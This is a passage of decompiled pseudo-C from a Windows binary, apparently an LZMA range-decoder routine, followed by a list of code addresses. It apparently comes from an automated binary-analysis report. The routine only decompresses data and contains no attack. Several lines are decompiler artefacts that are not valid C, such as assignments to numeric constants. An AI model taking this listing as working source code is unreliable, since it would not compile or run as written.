                                                                                            											 *(__ebp - 0x80) = 0x15;
                                                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                            											goto L69;
                                                                                            										case 0xc:
                                                                                            											L99:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0xc;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t334 = __ebp - 0x70;
                                                                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t334;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											__eax =  *(__ebp - 0x2c);
                                                                                            											goto L101;
                                                                                            										case 0xd:
                                                                                            											L37:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0xd;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t122 = __ebp - 0x70;
                                                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t122;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											L39:
                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                            												goto L48;
                                                                                            											}
                                                                                            											__eflags = __ebx - 0x100;
                                                                                            											if(__ebx >= 0x100) {
                                                                                            												goto L54;
                                                                                            											}
                                                                                            											L41:
                                                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                            											 *(__ebp - 0x48) = __eax;
                                                                                            											__eax = __eax + 1;
                                                                                            											__eax = __eax << 8;
                                                                                            											__eax = __eax + __ebx;
                                                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            											__ax =  *__esi;
                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                            											__edx = __ax & 0x0000ffff;
                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            												__cx = __ax;
                                                                                            												 *(__ebp - 0x40) = 1;
                                                                                            												__cx = __ax >> 5;
                                                                                            												__eflags = __eax;
                                                                                            												__ebx = __ebx + __ebx + 1;
                                                                                            												 *__esi = __ax;
                                                                                            											} else {
                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                            												0x800 = 0x800 - __edx;
                                                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                            												__ebx = __ebx + __ebx;
                                                                                            												 *__esi = __cx;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            												goto L39;
                                                                                            											} else {
                                                                                            												goto L37;
                                                                                            											}
                                                                                            										case 0xe:
                                                                                            											L46:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t156 = __ebp - 0x70;
                                                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t156;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											while(1) {
                                                                                            												L48:
                                                                                            												__eflags = __ebx - 0x100;
                                                                                            												if(__ebx >= 0x100) {
                                                                                            													break;
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                            												__edx = __ebx + __ebx;
                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                            												__esi = __edx + __eax;
                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            												__ax =  *__esi;
                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            													__cx = __ax;
                                                                                            													_t170 = __edx + 1; // 0x1
                                                                                            													__ebx = _t170;
                                                                                            													__cx = __ax >> 5;
                                                                                            													__eflags = __eax;
                                                                                            													 *__esi = __ax;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                            													0x800 = 0x800 - __edi;
                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            													__ebx = __ebx + __ebx;
                                                                                            													 *__esi = __cx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													continue;
                                                                                            												} else {
                                                                                            													goto L46;
                                                                                            												}
                                                                                            											}
                                                                                            											L54:
                                                                                            											_t173 = __ebp - 0x34;
                                                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                            											__eflags =  *_t173;
                                                                                            											goto L55;
                                                                                            										case 0xf:
                                                                                            											L58:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0xf;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t203 = __ebp - 0x70;
                                                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t203;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											L60:
                                                                                            											__eflags = __ebx - 0x100;
                                                                                            											if(__ebx >= 0x100) {
                                                                                            												L55:
                                                                                            												__al =  *(__ebp - 0x44);
                                                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                            												goto L56;
                                                                                            											}
                                                                                            											L61:
                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                            											__edx = __ebx + __ebx;
                                                                                            											__ecx =  *(__ebp - 0x10);
                                                                                            											__esi = __edx + __eax;
                                                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            											__ax =  *__esi;
                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            												__cx = __ax;
                                                                                            												_t217 = __edx + 1; // 0x1
                                                                                            												__ebx = _t217;
                                                                                            												__cx = __ax >> 5;
                                                                                            												__eflags = __eax;
                                                                                            												 *__esi = __ax;
                                                                                            											} else {
                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                            												0x800 = 0x800 - __edi;
                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            												__ebx = __ebx + __ebx;
                                                                                            												 *__esi = __cx;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            												goto L60;
                                                                                            											} else {
                                                                                            												goto L58;
                                                                                            											}
                                                                                            										case 0x10:
                                                                                            											L109:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0x10;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t365 = __ebp - 0x70;
                                                                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t365;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											goto L111;
                                                                                            										case 0x11:
                                                                                            											L69:
                                                                                            											__esi =  *(__ebp - 0x58);
                                                                                            											 *(__ebp - 0x84) = 0x12;
                                                                                            											while(1) {
                                                                                            												 *(_t613 - 0x54) = _t606;
                                                                                            												goto L133;
                                                                                            											}
                                                                                            										case 0x12:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                            												 *(__ebp - 0x84) = 0x13;
                                                                                            												__esi =  *(__ebp - 0x58) + 2;
                                                                                            												while(1) {
                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                            													goto L133;
                                                                                            												}
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                            											__eflags = __eax;
                                                                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                            											goto L130;
                                                                                            										case 0x13:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												_t469 = __ebp - 0x58;
                                                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                            												__eflags =  *_t469;
                                                                                            												 *(__ebp - 0x30) = 0x10;
                                                                                            												 *(__ebp - 0x40) = 8;
                                                                                            												L144:
                                                                                            												 *(__ebp - 0x7c) = 0x14;
                                                                                            												goto L145;
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                            											 *(__ebp - 0x30) = 8;
                                                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                            											L130:
                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                            											 *(__ebp - 0x40) = 3;
                                                                                            											goto L144;
                                                                                            										case 0x14:
                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                            											__eax =  *(__ebp - 0x80);
                                                                                            											 *(_t613 - 0x88) = _t533;
                                                                                            											goto L1;
                                                                                            										case 0x15:
                                                                                            											__eax = 0;
                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            											__al = __al & 0x000000fd;
                                                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                            											goto L120;
                                                                                            										case 0x16:
                                                                                            											__eax =  *(__ebp - 0x30);
                                                                                            											__eflags = __eax - 4;
                                                                                            											if(__eax >= 4) {
                                                                                            												_push(3);
                                                                                            												_pop(__eax);
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 4);
                                                                                            											 *(__ebp - 0x40) = 6;
                                                                                            											__eax = __eax << 7;
                                                                                            											 *(__ebp - 0x7c) = 0x19;
                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                            											goto L145;
                                                                                            										case 0x17:
                                                                                            											L145:
                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                            											 *(__ebp - 0x50) = 1;
                                                                                            											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                            											goto L149;
                                                                                            										case 0x18:
                                                                                            											L146:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0x18;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t484 = __ebp - 0x70;
                                                                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t484;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											L148:
                                                                                            											_t487 = __ebp - 0x48;
                                                                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                            											__eflags =  *_t487;
                                                                                            											L149:
                                                                                            											__eflags =  *(__ebp - 0x48);
                                                                                            											if( *(__ebp - 0x48) <= 0) {
                                                                                            												__ecx =  *(__ebp - 0x40);
                                                                                            												__ebx =  *(__ebp - 0x50);
                                                                                            												0 = 1;
                                                                                            												__eax = 1 << __cl;
                                                                                            												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                            												__eax =  *(__ebp - 0x7c);
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												while(1) {
                                                                                            													 *(_t613 - 0x88) = _t533;
                                                                                            													goto L1;
                                                                                            												}
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 0x50);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                            											__esi = __edx + __eax;
                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                            											__ax =  *__esi;
                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            												__cx = __ax;
                                                                                            												__cx = __ax >> 5;
                                                                                            												__eax = __eax - __ecx;
                                                                                            												__edx = __edx + 1;
                                                                                            												__eflags = __edx;
                                                                                            												 *__esi = __ax;
                                                                                            												 *(__ebp - 0x50) = __edx;
                                                                                            											} else {
                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                            												0x800 = 0x800 - __edi;
                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            												 *__esi = __cx;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            												goto L148;
                                                                                            											} else {
                                                                                            												goto L146;
                                                                                            											}
                                                                                            										case 0x19:
                                                                                            											__eflags = __ebx - 4;
                                                                                            											if(__ebx < 4) {
                                                                                            												 *(__ebp - 0x2c) = __ebx;
                                                                                            												L119:
                                                                                            												_t393 = __ebp - 0x2c;
                                                                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                            												__eflags =  *_t393;
                                                                                            												L120:
                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                            												__eflags = __eax;
                                                                                            												if(__eax == 0) {
                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                                                            													goto L171;
                                                                                            												}
                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                            												_t400 = __ebp - 0x60;
                                                                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                            												__eflags =  *_t400;
                                                                                            												goto L123;
                                                                                            											}
                                                                                            											__ecx = __ebx;
                                                                                            											__eax = __ebx;
                                                                                            											__ecx = __ebx >> 1;
                                                                                            											__eax = __ebx & 0x00000001;
                                                                                            											__ecx = (__ebx >> 1) - 1;
                                                                                            											__al = __al | 0x00000002;
                                                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                                                            											__eflags = __ebx - 0xe;
                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                            											if(__ebx >= 0xe) {
                                                                                            												__ebx = 0;
                                                                                            												 *(__ebp - 0x48) = __ecx;
                                                                                            												L102:
                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                            													__eax = __eax + __ebx;
                                                                                            													 *(__ebp - 0x40) = 4;
                                                                                            													 *(__ebp - 0x2c) = __eax;
                                                                                            													__eax =  *(__ebp - 4);
                                                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                                                            													__eflags = __eax;
                                                                                            													L108:
                                                                                            													__ebx = 0;
                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                            													 *(__ebp - 0x50) = 1;
                                                                                            													 *(__ebp - 0x44) = 0;
                                                                                            													 *(__ebp - 0x48) = 0;
                                                                                            													L112:
                                                                                            													__eax =  *(__ebp - 0x40);
                                                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                            														_t391 = __ebp - 0x2c;
                                                                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                            														__eflags =  *_t391;
                                                                                            														goto L119;
                                                                                            													}
                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                            													__esi = __edi + __eax;
                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                            													__ax =  *__esi;
                                                                                            													__ecx = __ax & 0x0000ffff;
                                                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                                                            														__ecx = 0;
                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                            														__ecx = 1;
                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                            														__ebx = 1;
                                                                                            														__ecx =  *(__ebp - 0x48);
                                                                                            														__ebx = 1 << __cl;
                                                                                            														__ecx = 1 << __cl;
                                                                                            														__ebx =  *(__ebp - 0x44);
                                                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                            														__cx = __ax;
                                                                                            														__cx = __ax >> 5;
                                                                                            														__eax = __eax - __ecx;
                                                                                            														__edi = __edi + 1;
                                                                                            														__eflags = __edi;
                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                            														 *__esi = __ax;
                                                                                            														 *(__ebp - 0x50) = __edi;
                                                                                            													} else {
                                                                                            														 *(__ebp - 0x10) = __edx;
                                                                                            														0x800 = 0x800 - __ecx;
                                                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            														 *__esi = __dx;
                                                                                            													}
                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            														L111:
                                                                                            														_t368 = __ebp - 0x48;
                                                                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                            														__eflags =  *_t368;
                                                                                            														goto L112;
                                                                                            													} else {
                                                                                            														goto L109;
                                                                                            													}
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0xc);
                                                                                            												__ebx = __ebx + __ebx;
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            													__ebx = __ebx | 0x00000001;
                                                                                            													__eflags = __ebx;
                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													L101:
                                                                                            													_t338 = __ebp - 0x48;
                                                                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                            													__eflags =  *_t338;
                                                                                            													goto L102;
                                                                                            												} else {
                                                                                            													goto L99;
                                                                                            												}
                                                                                            											}
                                                                                            											__edx =  *(__ebp - 4);
                                                                                            											__eax = __eax - __ebx;
                                                                                            											 *(__ebp - 0x40) = __ecx;
                                                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                            											goto L108;
                                                                                            										case 0x1a:
                                                                                            											L56:
                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0x1a;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x68);
                                                                                            											__al =  *(__ebp - 0x5c);
                                                                                            											__edx =  *(__ebp - 8);
                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            											 *( *(__ebp - 0x68)) = __al;
                                                                                            											__ecx =  *(__ebp - 0x14);
                                                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                            											__eax = __ecx + 1;
                                                                                            											__edx = 0;
                                                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                            											__edx = _t192;
                                                                                            											goto L79;
                                                                                            										case 0x1b:
                                                                                            											L75:
                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0x1b;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                                                            												__eflags = __eax;
                                                                                            											}
                                                                                            											__edx =  *(__ebp - 8);
                                                                                            											__cl =  *(__eax + __edx);
                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                            											 *(__ebp - 0x5c) = __cl;
                                                                                            											 *(__eax + __edx) = __cl;
                                                                                            											__eax = __eax + 1;
                                                                                            											__edx = 0;
                                                                                            											_t274 = __eax %  *(__ebp - 0x74);
                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                            											__edx = _t274;
                                                                                            											__eax =  *(__ebp - 0x68);
                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            											_t283 = __ebp - 0x64;
                                                                                            											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                            											__eflags =  *_t283;
                                                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                                                            											L79:
                                                                                            											 *(__ebp - 0x14) = __edx;
                                                                                            											goto L80;
                                                                                            										case 0x1c:
                                                                                            											while(1) {
                                                                                            												L123:
                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                            													break;
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                            													__eflags = __eax;
                                                                                            												}
                                                                                            												__edx =  *(__ebp - 8);
                                                                                            												__cl =  *(__eax + __edx);
                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                            												 *(__eax + __edx) = __cl;
                                                                                            												__eax = __eax + 1;
                                                                                            												__edx = 0;
                                                                                            												_t414 = __eax %  *(__ebp - 0x74);
                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                            												__edx = _t414;
                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                            												__eflags =  *(__ebp - 0x30);
                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                            												 *(__ebp - 0x14) = _t414;
                                                                                            												if( *(__ebp - 0x30) > 0) {
                                                                                            													continue;
                                                                                            												} else {
                                                                                            													L80:
                                                                                            													 *(__ebp - 0x88) = 2;
                                                                                            													goto L1;
                                                                                            												}
                                                                                            											}
                                                                                            											 *(__ebp - 0x88) = 0x1c;
                                                                                            											goto L170;
                                                                                            									}
                                                                                            								}
                                                                                            								L171:
                                                                                            								_t535 = _t534 | 0xffffffff;
                                                                                            								goto L172;
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            			}













                                                                                            0x00000000
                                                                                            0x00406355
                                                                                            0x00406355
                                                                                            0x00406359
                                                                                            0x00406382
                                                                                            0x0040638c
                                                                                            0x0040635b
                                                                                            0x00406364
                                                                                            0x00406371
                                                                                            0x00406374
                                                                                            0x004066b8
                                                                                            0x004066b8
